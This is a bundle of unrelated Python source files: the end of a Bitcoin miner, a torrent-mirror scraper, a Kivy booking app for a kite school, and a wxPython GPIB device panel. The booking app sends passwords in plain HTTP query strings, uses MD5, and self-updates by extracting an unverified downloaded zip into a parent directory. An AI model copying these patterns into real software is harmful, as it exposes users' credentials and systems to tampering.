if m:
continue
# parse key=value lines
m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
settings[m.group(1)] = m.group(2)
f.close()
if 'host' not in settings:
settings['host'] = '127.0.0.1'
if 'port' not in settings:
settings['port'] = 8332
if 'threads' not in settings:
settings['threads'] = 1
if 'hashmeter' not in settings:
settings['hashmeter'] = 0
if 'scantime' not in settings:
settings['scantime'] = 30L
if 'rpcuser' not in settings or 'rpcpass' not in settings:
print "Missing username and/or password in cfg file"
sys.exit(1)
settings['port'] = int(settings['port'])
settings['threads'] = int(settings['threads'])
settings['hashmeter'] = int(settings['hashmeter'])
settings['scantime'] = long(settings['scantime'])
thr_list = []
for thr_id in range(settings['threads']):
p = Process(target=miner_thread, args=(thr_id,))
p.start()
thr_list.append(p)
time.sleep(1) # stagger threads
print settings['threads'], "mining threads started"
print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
try:
for thr_proc in thr_list:
thr_proc.join()
except KeyboardInterrupt:
pass
print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
|
simple.py
|
import threading
import requests
from bs4 import BeautifulSoup
class Simple:
def __init__(self, player=None):
self.player = player
def search_thread(self, q):
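"""Scrape the nyaa mirror for query q and hand the (name, magnet URL) results to the attached player."""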
print("search thread begin")
try:
headers = {
'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'
}
r = requests.get("https://nyaa.unblockit.uno", params={"f": "0", "c":"1_0", "q": q}, headers=headers)
print(r.url)
if r.status_code != 200:
return
result = []
soup = BeautifulSoup(r.text, 'html.parser')
rows = soup.select("body > div > div.table-responsive > table > tbody > tr")
for row in rows:
sname = row.select("td:nth-child(2) > a:nth-child(2)")
smagnate = row.select("td:nth-child(3) > a:nth-child(2)")
if sname and smagnate:
name = sname[0].string
magnate = smagnate[0].get('href')
result.append({"name": name, "url": magnate})
print("search done")
print(result)
self.player.call('hot', result)
except:
import traceback
traceback.print_exc()
print("search thread end")
def on_search(self, *args, **kwargs):
print(f'{args=} {kwargs=}')
t = threading.Thread(target=self.search_thread, args=args)
t.start()
if __name__ == "__main__":
s = Simple()
s.search_thread('one punch')
|
main.py
|
# -*- coding: utf8 -*-
#
# (c) 2015 microelly2 MIT
#
vers="V123"
import kivy
kivy.require('1.0.9')
from kivy.app import App
from kivy.properties import *
from kivy.base import EventLoop
from kivy.uix.button import Button
from kivy.uix.floatlayout import FloatLayout
from kivy.uix.gridlayout import GridLayout
from kivy.uix.boxlayout import BoxLayout
from kivy.uix.scrollview import ScrollView
#from kivy.lang import Builder
from kivy.clock import Clock
from kivy.properties import BooleanProperty
from kivy.utils import platform
from kivy.uix.popup import Popup
from kivy.uix.screenmanager import ScreenManager, Screen
from kivy.factory import Factory
from kivy.support import *
install_android()
import datetime,re,os,random, time, threading
import httplib, socket, urllib2, zipfile
#from kivy.config import Config
#Config.set('graphics', 'width', '600')
#Config.set('graphics', 'height', '800')
# Config.set('graphics', 'width', '160')
# Config.set('graphics', 'height', '620')
superbl=None
def update(btn):
print "update software .... not implemented"
class KButton(Button):
key=Property('')
class addon(FloatLayout):
pass
# the graphical user interface
class kite(FloatLayout):
pass
if platform == "android":
import android
from jnius import autoclass, cast
from android.runnable import run_on_ui_thread
# Toast = autoclass("android.widget.Toast")
class PopupBox(Popup):
pop_up_text = ObjectProperty()
def update_pop_up_text(self, p_message):
self.pop_up_text.text = p_message
def unzip(zipFilePath, destDir):
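# extract every entry of the zip archive into destDir, creating directories as needed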
zfile = zipfile.ZipFile(zipFilePath)
if not os.path.exists(destDir):
os.mkdir(destDir)
for name in zfile.namelist():
print name
(dirName, fileName) = os.path.split(name)
newDir = destDir + '/' + dirName
if not os.path.exists(newDir):
os.mkdir(newDir)
if not fileName == '':
fd = open(destDir + '/' + name, 'wb')
fd.write(zfile.read(name))
fd.close()
def wotagstring(wotagint):
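# map a weekday index (Monday=0) to its German two-letter abbreviation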
week = [ 'Mo', 'Di', 'Mi', 'Do', 'Fr', 'Sa','So']
return week[wotagint]
# the application ...
class kiteApp(App):
global update
exitnext = BooleanProperty(False)
tag=Property('')
stunde=Property('')
klasse=Property('')
name=Property('Schlaumeier-Neugscheid')
geraet=Property(None)
but=Property(None)
ao=Property(None)
bl=Property(None)
ip=Property('192.168.178.22')
ip=Property('freecadbuch.de')
def build(self):
self.bind(on_start=self.post_build_init)
c= kite(title='Hello world')
return c
# def sayhello(self,button,name):
# print "Hello " + name + ", this is the simple App!"
# button.text = "[size=100][b]Super " + name + "[/b]\nSay hello [color=#ff0000]again![/size][/color]"
def setzeFarbe(self,but):
for b in but.parent.children:
b.background_color=(1,0,1,1)
but.background_color=(1,1,0,1)
def setzeTag(self,but):
print "setze Tage"
print but.text
self.tag=but.key
self.setzeFarbe(but)
#print self.root.buchen
print but.parent
print but.parent.parent
print but.parent.parent.parent
print but.parent.parent.parent.parent
print but.parent.parent.parent.parent.parent
but.parent.parent.parent.parent.parent.title=but.text
but.parent.parent.parent.parent.parent.collapse=True
self.upd()
self.aktualisiereGeraete(None)
self.root.tag.collapse=True
self.root.stunde.collapse=False
def setzeStunde(self,but):
print but.text
self.stunde=but.text
self.setzeFarbe(but)
but.parent.parent.parent.parent.parent.title=but.text
but.parent.parent.parent.parent.parent.collapse=True
self.upd()
self.aktualisiereGeraete(None)
self.root.stunde.collapse=True
self.root.geraet.collapse=False
def setzeGeraet(self,but):
print "SETZT GERAET"
print but.text
self.geraet=but.text
self.geraet=but.key
# self.setzeFarbe(but)
# but.parent.parent.parent.parent.parent.title=but.text
but.parent.parent.parent.parent.parent.collapse=True
self.upd()
self.buchen()
# self.clear()
def setzeKlasse(self,but):
print but.text
self.klasse=but.text
self.setzeFarbe(but)
but.parent.parent.parent.parent.parent.title=but.text
but.parent.parent.parent.parent.parent.collapse=True
self.upd()
def upd(self):
pass
def buchen(self):
if self.tag=='':
print "kein Tag"
self.root.tag.collapse=False
self.root.geraet.collapse=True
elif self.stunde=='':
print "keine Stunde"
self.root.tag.collapse=True
self.root.stunde.collapse=False
self.root.geraet.collapse=True
else:
print "Tag ist da"
print self.tag
mess=str(self.tag+self.heute) + ":"+ str(self.stunde) + ";"+ str(self.geraet)+':'+self.name
print mess
rc=self.sendeBuchung(mess)
print rc
# show the booking
self.meineBuchungen()
#but=Button()
#but.text=self.doyString(self.tag) + " -"+ str(self.stunde) + "- "+ str(self.geraet)
#self.but=but
#but.on_release=self.loesche
#self.root.liste.add_widget(but)
self.root.buchen.collapse=True
self.root.liste.collapse=False
print self.root.liste.collapse
# self.tag=''
t=int(self.tag)
s=int(self.stunde)
if s>=9:
s=0
t +=1
self.tag=int(t)
self.stunde=str(s+1)
self.geraet=''
self.klasse=''
self.upd()
self.clear()
def clear(self):
# self.root.geraet.title="Geraet ??"
# self.root.tag.title="Tag"
self.root.tag.title=self.doyString(self.tag)
self.root.stunde.title=str(self.stunde)
# self.root.buchen.title="Clear"
return
if not self.ao:
self.ao=addon()
self.bl=self.root.kite
self.root.remove_widget(self.root.kite)
self.root.add_widget(self.ao)
else:
self.root.remove_widget(self.ao)
self.root.add_widget(self.bl)
self.ao=False
def loesche(self):
but=self.but
print "loesche", but
print but.parent
but.parent.remove_widget(but)
def wechseln(self):
layout = GridLayout(cols=2)
for i in range(21):
layout.add_widget(Button(text='Hello 1'))
# layout.add_widget(Button(text='World 1'))
button = Button(text='zurick!', font_size=14)
button.bind(on_release=self.goback)
layout.add_widget(button)
self.rest=self.root.children[0]
self.root.remove_widget(self.rest)
self.root.add_widget(layout)
print self.root.children
def wechseln2(self):
layout = GridLayout(cols=7)
for stunde in range(9):
for geraet in range(7):
b=Button(text=str(geraet+1)+'\n'+str(stunde+1))
r=random.random()
if r < 0.6:
b.background_color=(1,0,1,1)
else:
b.background_color=(0,1,1,1)
layout.add_widget(b)
# layout.add_widget(Button(text='World 1'))
for g in ['z','u','r','i','c','k','!']:
button = Button(text=g)
button.bind(on_release=self.goback)
layout.add_widget(button)
self.rest=self.root.children[0]
self.root.remove_widget(self.rest)
self.root.add_widget(layout)
print self.root.children
def goback(self,but):
print self.root.children
self.root.remove_widget(self.root.children[0])
self.root.add_widget(self.rest)
print "giback"
def on_pause(self):
# Here you can save data if needed
return True
def on_resume(self):
# Here you can check if any data needs replacing (usually nothing)
pass
def on_stop(self):
print "on_stop"
#self.schreibeTagDatei()
def sayhello(self,button,name=None):
print "Hello " + str(name) + ", this is the simple App!"
# button.text = "[size=100][b]Super " + name + "[/b]\nSay hello [color=#ff0000]again![/size][/color]"
# button.text='Buchen'
if name:
self.name=name
print self.ao
global superbl
print superbl
self.root.clear_widgets()
if not self.ao:
self.ao=addon()
self.bl=self.root.bl
# self.root.remove_widget(self.root.bl)
self.root.add_widget(self.ao)
else:
# self.root.remove_widget(self.ao)
self.root.add_widget(self.bl)
self.root.buchen.collapse=True
self.root.liste.collapse=False
self.root.tag.collapse=True
self.root.stunde.collapse=True
self.root.geraet.collapse=True
self.meineBuchungen()
# self.ao=False
# self.liste fuellen
def sayhello2(self,a):
self.sayhello(self,a)
def sendeBuchung(self,mess):
c = httplib.HTTPConnection(self.ip)
authstring="&u="+self.user+"&n="+self.name+"&p="+self.passw
sendstring= "/appdat_server/appstore.php?m="+ mess+"&u=user&h=1234&k=9876"+authstring
print "Sendstrung"
print sendstring
c.request("GET", sendstring)
response = c.getresponse()
print "rsponce:",response.status, response.reason
if response.status == 200:
data = response.read()
print data
vals=data.split('\n')
vals.pop(-1)
print vals
return vals
else:
print "Fehler Datensendung"
def lesedatei(self,dateiname):
print "Lese Daten aus dem Netz ..."
try:
c = httplib.HTTPSConnection(self.ip)
c.connect()
except :
print "Error HTTPS"
try:
c = httplib.HTTPConnection(self.ip)
c.connect()
except :
print "Error HTTP"
return []
authstring="&u="+self.user+"&n="+self.name+"&p="+self.passw
req="/appdat_server/appconfig.php?c="+ dateiname +".txt" + "&u=user&h=1234&k=9876"+authstring
print req
c.request("GET", req)
response = c.getresponse()
print "rsponce:",response.status, response.reason
if response.status == 200:
print "ok"
else:
print "problem : the query returned %s because %s" % (response.status, response.reason)
# print("-----##-")
data = response.read()
# print data
# print("-----++-")
vals=data.split('\n')
print "auth string .."
print vals[0]
vals.pop(-1)
vals.pop(0)
# for v in vals:
# print "!"+v+"!"
return vals
def holeBuchungen(self):
day_of_year = datetime.datetime.now().timetuple().tm_yday
self.heute=day_of_year
day='274'
ss=(datetime.datetime.now() + datetime.timedelta(days=int(day)-day_of_year)).strftime(", %d.%m")
print ss
buchs=self.lesedatei("buchungen")
# print buchs
buli={}
for b in buchs:
try:
[k,d]=b.split(';')
[t,s]=k.split(':')
[g,u]=d.split(':')
day=t
ss=(datetime.datetime.now() + datetime.timedelta(days=int(day)-day_of_year)).strftime(", %d.%m")
print [t,ss,s,g,u]
try:
buli[t]
except:
buli[t]={}
try:
buli[t][s]
except:
buli[t][s]={}
try:
buli[t][s][g]
except:
buli[t][s][g]=[]
if u=='frei':
del(buli[t][s][g])
else:
buli[t][s][g].append(u)
except:
print "fehler bei verarbeiten von " + b + "!"
for t in sorted(buli):
# print "##",t
for s in sorted(buli[t]):
# print "--",s
for g in sorted(buli[t][s]):
print [t,s,g,buli[t][s][g]]
pass
self.buli=buli
return buli
def holePersonen(self):
return self.lesedatei('personen')
def holeGeraete(self):
print "hole geraete"
lg=self.lesedatei('geraete')
self.root.geraete.clear_widgets()
for g in lg:
#gt=datetime.datetime.now().strftime("%H:%M:%S\n") + g
gt=g
w=Button(text=gt,on_release = self.setzeGeraet)
print w.on_release
self.root.geraete.add_widget(w)
def holeStunden(self):
self.root.stunden.clear_widgets()
for g in range(9):
w=KButton(text=str(g+1), on_release = self.setzeStunde,key=g)
print w.key
self.root.stunden.add_widget(w)
def holeTage(self):
self.root.tage.clear_widgets()
for g in range(14):
gs="tag " +str(g)
wd=(datetime.datetime.now() + datetime.timedelta(hours=24*g)).weekday()
if wd != 5 and wd != 6:
ss= (datetime.datetime.now() + datetime.timedelta(hours=24*g)).strftime(", %d.%m")
week = [ 'Mo', 'Di', 'Mi', 'Do', 'Fr', 'Sa','So']
gs=week[wd] + ss
w=KButton(text=gs, on_release = self.setzeTag,key=g)
self.root.tage.add_widget(w)
def aktualisiereGeraete(self,but):
print "aktualisiere GERAAATER"
lg=self.lesedatei('geraete')
self.root.geraete.clear_widgets()
print "aktualisiere geraet"
print self.buli
print "--------------------------------------"
print self.tag
print self.heute
print self.stunde
print "------------------------------"
try:
print self.buli[str(self.heute+self.tag)][str(self.stunde)]
zz=self.buli[str(self.heute+self.tag)][str(self.stunde)]
except:
zz={}
print "tag/stunde frei"
print "-------------"
for sg in lg:
print sg
sgl= sg.split(';')
g=sgl[0]
if len(sgl)>1:
try:
wotag=self.tag
if wotag>7: wotag -= 7
gaddl=sgl[wotag].split(':')
print (gaddl)
print self.stunde
print self.heute
gadd= " (" + gaddl[int(self.stunde)] + ")"
except:
gadd=""
else:
gadd=""
gt= g + gadd
if g in zz:
w=Button(text=gt + "\n"+str(zz[g]))
w.background_color=(1,0,0,1)
else:
w=KButton(text=gt,on_release = self.setzeGeraet)
w.key=g
w.background_color=(0,1,0,1)
#print w
#print w.on_release
# w=Button(text=gt+"TT",on_enter = self.setzeTag)
self.root.geraete.add_widget(w)
def meineBuchungen(self):
buli=self.holeBuchungen()
self.root.liste.clear_widgets()
farbe=True
for t in sorted(buli):
print "##",t
if int(t) <self.heute:
continue
for s in sorted(buli[t]):
print "--",s
for g in sorted(buli[t][s]):
print [t,s,g,buli[t][s][g]]
nick=buli[t][s][g][0][0:2]
if nick != self.user:
continue
tt=self.doyString2(t)
ytext= " ".join([tt,s,g,buli[t][s][g][0][0:2]])
btn = Button(text=ytext)
from functools import partial
s3= t+':'+s+';'+g+':frei'
print s3
def myprint(s,btn):
print s
btn.parent.remove_widget(btn)
rc=self.sendeBuchung(s)
print rc
print "Auswertung ---------------------------------------"
self.meineBuchungen()
print "aktualisiert ---------------------------------------------"
btn.on_release = partial(myprint,s3,btn)
if farbe:
btn.background_color=(1,0,1,1)
else:
btn.background_color=(0,1,1,1)
farbe = not farbe
self.root.liste.add_widget(btn)
def langeListe(self):
layout = GridLayout(cols=1, padding=10, spacing=10,
size_hint=(None, None), width=180)
layout.bind(minimum_height=layout.setter('height'))
buli=self.holeBuchungen()
for t in sorted(buli):
print "##",t
neuerTag=True
if int(t) <self.heute:
continue
neueStunde=True
for s in sorted(buli[t]):
print "--",s
if len(buli[t][s]):
neueStunde= not neueStunde
print neueStunde
for g in sorted(buli[t][s]):
print [t,s,g,buli[t][s][g]]
nick=buli[t][s][g][0][0:2]
tt=self.doyString2(t)
ytext= " ".join([s,g,buli[t][s][g][0][0:2]])
btn = Button(text=ytext, size=(280, 40),
size_hint=(None, None))
if neueStunde:
btn.background_color=(1,0,1,1)
else:
btn.background_color=(0,1,1,1)
if neuerTag:
wotagint=1
wotagint=self.doy2dow(t)
ytext2=wotagstring(wotagint) + ", " + tt # " ".join([tt,s,g,buli[t][s][g][0][0:2]])
btn2 = Button(text=ytext2, size=(280, 40),
size_hint=(None, None))
btn2.background_color=(0,0,1,1)
layout.add_widget(btn2)
neuerTag=False
layout.add_widget(btn)
pass
root2 = ScrollView(size_hint=(None, None), size=(300, 590),
pos_hint={'center_x': .5, 'center_y': .5}, do_scroll_x=False)
root2.add_widget(layout)
root3=BoxLayout(orientation='vertical')
b=Button(text="f1 (nofunc)")
root3.add_widget(b)
b=Button(text="Buchen",on_release=self.sayhello)
root3.add_widget(b)
b=Button(text="Start", on_release=self.gomain)
root3.add_widget(b)
root=BoxLayout( orientation='horizontal')
root.add_widget(root3)
root.add_widget(root2)
self.root.remove_widget(self.ao)
try:
self.root.remove_widget(self.bl)
except:
pass
self.root.add_widget(root)
def gomain(self,a):
self.root.remove_widget(self.root.children[0])
try:
self.root.remove_widget(self.bl)
except:
pass
self.root.add_widget(self.ao)
def gobl(self,a):
self.root.remove_widget(self.root.children[0])
self.root.add_widget(self.bl)
def doyString(self,doy):
ss=(datetime.datetime.now() + datetime.timedelta(days=int(doy))).strftime("%d.%m.")
return ss
def doyString2(self,doy):
day_of_year = datetime.datetime.now().timetuple().tm_yday
ss=(datetime.datetime.now() + datetime.timedelta(days=int(doy)-day_of_year)).strftime("%d.%m.")
return ss
def doy2dow(self,doy):
day_of_year = datetime.datetime.now().timetuple().tm_yday
ss=(datetime.datetime.now() + datetime.timedelta(days=int(doy)-day_of_year)).weekday()
return ss
def configure(self,but):
print "configure writer file ..."
f = open('myfile','w')
#print but.parent.children[1]
#print but.parent.children[1].children
l=len(but.parent.children) -4
for i in but.parent.children:
print i
print "huhu"
print l
self.passw=but.parent.children[l].children[0].text
self.user=but.parent.children[l].children[1].text
self.name=but.parent.children[l].children[2].text
f.write(self.user + ':1234:'+ self.name+'\n') # python will convert \n to os.linesep
f.close() # you can omit in most cases as the destructor will call it
try:
self.addon.add_widget(self.bucher)
except:
pass
self.readconfig(but)
def readversion(self):
l2='title=xy:9876:Ix Ypslein'
try:
f = open("android.txt")
lines = f.readlines()
for l in lines:
l2=l.split('=')
print l2
if l2[0]=='title':
f.close()
return l2[1].strip()
except:
return "??"
def readconfig(self,but):
l2='xy:9876:Ix Ypslein'
try:
f = open("myfile")
lines = f.readlines()
for l in lines:
l2=l.strip()
f.close()
except:
l2='xy:9876:Ix Ypslein'
[self.user,self.passw,self.name]=l2.split(':')
import hashlib
self.md5=hashlib.md5(self.passw).hexdigest()
import random
self.hash=random.randint(1000,9999)
self.md5hash=hashlib.md5(str(self.hash)).hexdigest()
print (self.user, self.passw,self.md5,self.hash,self.md5hash)
try:
print but
but.text='angemeldet als ' + '-'.join([self.user, self.passw,self.md5,str(self.hash),self.md5hash])
except:
pass
print "done"
return [self.user, self.name, self.passw,self.md5,str(self.hash),self.md5hash]
def on_start(self):
global superbl
global vers
if not self.ao:
self.ao=addon()
self.bl=self.root.kite
superbl=self.root.kite
self.root.remove_widget(self.root.kite)
self.root.add_widget(self.ao)
ll=self.readconfig(None)
self.ao.name.text=ll[0]
self.ao.namelong.text=ll[1]
self.bucher=self.ao.bucher
self.addon=self.ao.addon
self.addon.remove_widget(self.bucher)
print superbl
else:
self.root.remove_widget(self.ao)
self.root.add_widget(self.bl)
self.ao=False
#self.personen=self.holePersonen()
self.geraete=self.holeStunden()
self.geraete=self.holeGeraete()
self.holeTage()
self.root.liste.clear_widgets()
# testuser
self.user=self.ao.name.text
day_of_year = datetime.datetime.now().timetuple().tm_yday
self.heute=day_of_year
if sap.updater():
global update
print "update yes/no ..."
btn = Button(
text='Update Software required', font_size=14,
on_release = self.process_button_click
)
self.addon.add_widget(btn)
print self.addon.children[0]
# set the title
self.addon.children[5].text='[color=#ffff00][size=50][b]Snow Kite School V '+vers +'[/b][/size][/color]'
print "----------------"
title=self.readversion()
print "title:"+title
self.addon.children[5].text='[color=#ffff00][size=50][b]' + title + '[/b][/size][/color]'
def post_build_init(self, *args):
# Map Android keys
if platform == 'android':
android.map_key(android.KEYCODE_BACK, 1000)
android.map_key(android.KEYCODE_MENU, 1001)
win = self._app_window
win.bind(on_keyboard=self._key_handler)
def _key_handler(self, *args):
key = args[1]
print "key handler"
print key
try:
# Escape or Android's back key
#self.root.lab.text="EXIT key=" + str(key)
if key in (1000, 27):
self.hide_kbd_or_exit()
return True
except:
return False
def reset_exitnext(self,t):
self.exitnext=False
def hide_kbd_or_exit(self, *args):
if not self.exitnext:
self.exitnext = True
            # wait briefly for a possible double press (double press = exit)
Clock.schedule_once(self.reset_exitnext,0.5)
self.gomain(None)
else:
self.stop()
def updater(self):
return True
# hack
import re
source="https://github.com/microelly2/kivy-ressourcen/archive/master.zip"
print(source)
plugin="microelly2/kivy-ressourcen"
fn='https://api.github.com/repos/microelly2/kivy-ressourcen/commits'
gitdate='no date from git'
try:
fn='https://api.github.com/repos/' + plugin + '/commits'
import urllib,json
data=urllib.urlopen(fn).read()
print data
d = json.loads(data)
dit=d[0]
gitdate=dit['commit']['committer']['date']
print (gitdate)
installdate="2015-10-21T15:02:35Z"
print (installdate)
except:
return True
upd=False
if installdate >gitdate:
mess="--- package " + plugin + " is up to date ---"
else:
mess="!!! update for " + plugin + " recommented !!!"
upd=True
print mess
return upd
####################
def show_popup(self):
#self.pop_up = Factory.PopupBox()
self.pop_up = PopupBox()
self.pop_up.update_pop_up_text('Running some task...')
self.pop_up.open()
def process_button_click(self,dummy):
self.show_popup()
# self.source=source
mythread1 = threading.Thread(target=self.something_that_takes_5_seconds_to_run)
mythread = threading.Thread(target=self.readZip)
mythread1.start()
mythread.start()
def something_that_takes_5_seconds_to_run(self):
thistime = time.time()
while thistime + 5 > time.time(): # 5 seconds
self.pop_up.update_pop_up_text('running ' + '*' * int(time.time()-thistime))
time.sleep(1)
def readZip(self,but=None):
source='https://github.com/microelly2/kivy-ressourcen/archive/master.zip'
self.pop_up.update_pop_up_text('get git ' + source + ' ...')
try:
response = urllib2.urlopen(source)
zipcontent= response.read()
with open("my.zip", 'w') as f:
f.write(zipcontent)
f.close()
except:
self.pop_up.update_pop_up_text('error getting the git')
return
self.pop_up.update_pop_up_text('unzip ...')
print "download"
try:
unzip("my.zip","..")
except:
self.pop_up.update_pop_up_text('error unzip')
return
self.pop_up.dismiss()
####################
if __name__ == '__main__' and True:
sap=kiteApp()
sap.updater()
sap.run()
|
panelIntroV1.py
|
import wx # Library used for the interface components
import visa # Library for device interfacing. In this case, GPIB access
import saveSession
from threading import Thread
from Instruments import instrument_names
import os
from wx.lib.pubsub import pub
import tkinter
from tkinter import filedialog
ID_DEVICE_FOUND = wx.NewId()
ID_DEVICE_NOT_FOUND = wx.NewId()
def getDeviceInfo(rm, address):
entry = ''
device = {}
try:
inst = rm.open_resource(address)
try:
nameInst = inst.query("*IDN?")
# remove newlines
nameInst = nameInst.replace('\n', ' ')
entry = f"Model: {nameInst} Address: {address}"
device = {"idn": nameInst, "address": address}
inst.close()
except Exception as e:
print(e)
inst.close()
except Exception as e:
print(e)
wx.MessageDialog(None, f"Could not open device at address {address}").ShowModal()
return entry, device
class btnIntroPanel(wx.Panel):
def __init__(self, parent, devNameList):
wx.Panel.__init__(self,parent)
btnWidth = 150
btnHeight = 40
self.button = []
button_sizer = wx.BoxSizer(wx.VERTICAL)
for i in range(len(devNameList)):
self.button.append(wx.Button(self, label = devNameList[i], size = (btnWidth, btnHeight)))
button_sizer.Add(self.button[i], 0, wx.ALL, 1)
button_sizer.Add(wx.StaticLine(self), 0, wx.ALL, 1)
#==============================================================================================================================================================
        # Every interface benefits from short explanatory text that makes it easier to use. This
        # text can take the form of "input/output" text slots or "labels".
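        # A hedged illustration (not part of the original layout): a static caption could be added
        # in the same way as the text slot below, e.g.
        #   caption = wx.StaticText(self, label="Assignment log:")
        #   button_sizer.Add(caption, 0, wx.ALL, 5)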
self.txtAssignResult = wx.TextCtrl(self, size = ( 390, 60), style = wx.TE_MULTILINE)
button_sizer.Add(self.txtAssignResult, 0, wx.ALL, 5)
button_sizer.Add(wx.StaticLine(self), 0, wx.ALL|wx.EXPAND, 5)
self.buttonClear = wx.Button(self, label = "& Clear Assignments", size = (200,60))
self.buttonDone = wx.Button(self, label = "& Done!", size = (200,60))
horizSizerClearDone = wx.BoxSizer(wx.HORIZONTAL)
horizSizerClearDone.Add(self.buttonDone, 0, wx.ALL, 0)
horizSizerClearDone.Add(self.buttonClear, 0, wx.ALL, 0)
button_sizer.Add(horizSizerClearDone, 0, wx.ALL, 5)
button_sizer.Add(wx.StaticLine(self), 0, wx.ALL|wx.EXPAND, 5)
#==============================================================================================================================================================
# create a normal bitmap button
bmpSave = wx.Bitmap("saveIcon.png", wx.BITMAP_TYPE_ANY)
bmpOpen = wx.Bitmap("openIcon.png", wx.BITMAP_TYPE_ANY)
bmpRefr = wx.Bitmap("refrIcon.png", wx.BITMAP_TYPE_ANY)
self.bmapBtnSave = wx.BitmapButton(self, id=wx.ID_ANY, bitmap=bmpSave, size=(bmpSave.GetWidth()+10, bmpSave.GetHeight()+10))
self.bmapBtnOpen = wx.BitmapButton(self, id=wx.ID_ANY, bitmap=bmpOpen, size=(bmpSave.GetWidth()+10, bmpSave.GetHeight()+10))
self.bmapBtnRefr = wx.BitmapButton(self, id=wx.ID_ANY, bitmap=bmpRefr, size=(bmpSave.GetWidth()+10, bmpSave.GetHeight()+10))
genHorizSizer = wx.BoxSizer(wx.HORIZONTAL)
genHorizSizer.Add(self.bmapBtnSave,0,wx.ALL,1)
genHorizSizer.Add(self.bmapBtnOpen,0,wx.ALL,1)
genHorizSizer.Add(self.bmapBtnRefr,0,wx.ALL,1)
# self.txtFileName = wx.TextCtrl(self, size = ( 390, 60))
button_sizer.Add(genHorizSizer, 0,wx.ALL,1)
# button_sizer.Add(self.txtFileName,0,wx.ALL,1)
# button_sizer.Add(wx.StaticLine(self), 0, wx.ALL | wx.EXPAND, 5)
# self.staticAssign = wx.StaticText(self, 1, "Macro Setup:", size=(150, 20))
# button_sizer.Add(self.staticAssign, 0, wx.CENTER, 0)
# bmpMacroOpen = wx.Bitmap("openIcon.png", wx.BITMAP_TYPE_ANY)
# bmpMacroRefr = wx.Bitmap("refrIcon.png", wx.BITMAP_TYPE_ANY)
# self.bmapMacroBtnOpen = wx.BitmapButton(self, id=wx.ID_ANY, bitmap=bmpMacroOpen,
# size=(bmpMacroOpen.GetWidth() + 10, bmpMacroOpen.GetHeight() + 10))
# self.bmapMacroBtnRefr = wx.BitmapButton(self, id=wx.ID_ANY, bitmap=bmpMacroRefr,
# size=(bmpMacroOpen.GetWidth() + 10, bmpMacroOpen.GetHeight() + 10))
# genMacroHorizSizer = wx.BoxSizer(wx.HORIZONTAL)
# genMacroHorizSizer.Add(self.bmapMacroBtnOpen, 0, wx.ALL, 1)
# genMacroHorizSizer.Add(self.bmapMacroBtnRefr, 0, wx.ALL, 1)
# button_sizer.Add(genMacroHorizSizer)
self.SetSizerAndFit(button_sizer)
class listIntroPanel(wx.Panel):
def __init__(self, parent):
wx.Panel.__init__(self,parent)
list_sizer = wx.BoxSizer(wx.VERTICAL)
self.onlyFiles = []
self.foundDevices = {}
list_sizer.Add(wx.StaticLine(self), 0, wx.ALL|wx.EXPAND, 5)
self.staticDevices = wx.StaticText(self,1,"Devices Found:", size=(150,20))
list_sizer.Add(self.staticDevices, 0, wx.CENTER, 0)
self.listFiles = wx.ListBox(self, size = (400,400), choices = ["Looking for devices..."], style = wx.LB_SINGLE)
list_sizer.Add(self.listFiles, 0, wx.ALL, 5)
self.btnAddress = wx.Button(self, label = "Open by Address")
list_sizer.Add(self.btnAddress, 0, wx.CENTER | wx.EXPAND | wx.LEFT | wx.RIGHT, 100)
self.Bind(wx.EVT_BUTTON, self.loadAddress, self.btnAddress)
self.SetSizerAndFit(list_sizer)
self.rm = visa.ResourceManager()
t = Thread(target=self.findDevices)
t.start()
def findDevices(self):
for i in self.rm.list_resources():
entry, device = getDeviceInfo(self.rm, i)
if entry:
self.onlyFiles.append(entry)
self.foundDevices[entry] = device
self.listFiles.Insert(entry, self.listFiles.GetCount() - 1)
self.listFiles.Delete(self.listFiles.GetCount() - 1)
def loadAddress(self, event = None):
with customAddressPopup(self) as addrPop:
if addrPop.ShowModal() == wx.ID_OK:
address = addrPop.address.GetLineText(0)
entry, device = getDeviceInfo(self.rm, address)
if entry:
self.onlyFiles.append(entry)
self.foundDevices[entry] = device
self.listFiles.Insert(entry, self.listFiles.GetCount() - 1)
class assignIntroPanel(wx.Panel):
def __init__(self, parent):
wx.Panel.__init__(self,parent)
assign_sizer = wx.BoxSizer(wx.VERTICAL)
self.assignedDevices = {}
assign_sizer.Add(wx.StaticLine(self), 0, wx.ALL|wx.EXPAND, 5)
self.staticAssign = wx.StaticText(self,1,"Assignments:", size=(150,20))
assign_sizer.Add(self.staticAssign, 0, wx.CENTER, 0)
self.listAssignment = wx.ListBox(self, size = (400,400), choices = [], style = wx.LB_SINGLE)
assign_sizer.Add(self.listAssignment, 0, wx.ALL, 5)
self.SetSizerAndFit(assign_sizer)
class missingDevicePopup(wx.Dialog):
def __init__(self, parent, error, availableDevices):
wx.Dialog.__init__(self, parent)
self.Centre(direction = wx.HORIZONTAL)
self.errorMes = wx.StaticText(self, 1, "{0}\nPlease select a corresponding device from the list below\nIf you can't see it check to ensure that it's correctly connected".format(error))
self.listHeader = wx.StaticText(self, 1, "Available devices")
self.listFiles = wx.ListBox(self, size = (400,400), choices = availableDevices, style = wx.LB_SINGLE)
self.buttonDone = wx.Button(self, id = ID_DEVICE_FOUND, label = "Done")
self.buttonNotDone = wx.Button(self, id = ID_DEVICE_NOT_FOUND, label = "I don't see it")
self.Bind(wx.EVT_BUTTON, self.not_found, self.buttonNotDone)
self.SetAffirmativeId(ID_DEVICE_FOUND)
main_sizer = wx.BoxSizer(wx.VERTICAL)
main_sizer.Add(self.errorMes, 0, wx.ALL|wx.EXPAND, 5)
main_sizer.Add(self.listHeader, 0, wx.ALL|wx.EXPAND, 5)
main_sizer.Add(self.listFiles, 0, wx.ALL|wx.EXPAND, 5)
main_sizer.Add(self.buttonDone, 0, wx.ALL|wx.EXPAND, 5)
main_sizer.Add(self.buttonNotDone, 0, wx.ALL|wx.EXPAND, 5)
self.SetSizerAndFit(main_sizer)
def not_found(self, event):
self.EndModal(ID_DEVICE_NOT_FOUND)
class customAddressPopup(wx.Dialog):
def __init__(self, parent):
wx.Dialog.__init__(self, parent)
self.Centre()
self.listHeader = wx.StaticText(self, 1, "Device Address: ")
self.address = wx.TextCtrl(self, size = (400,20))
self.buttonDone = wx.Button(self, id = wx.ID_OK, label = "Done")
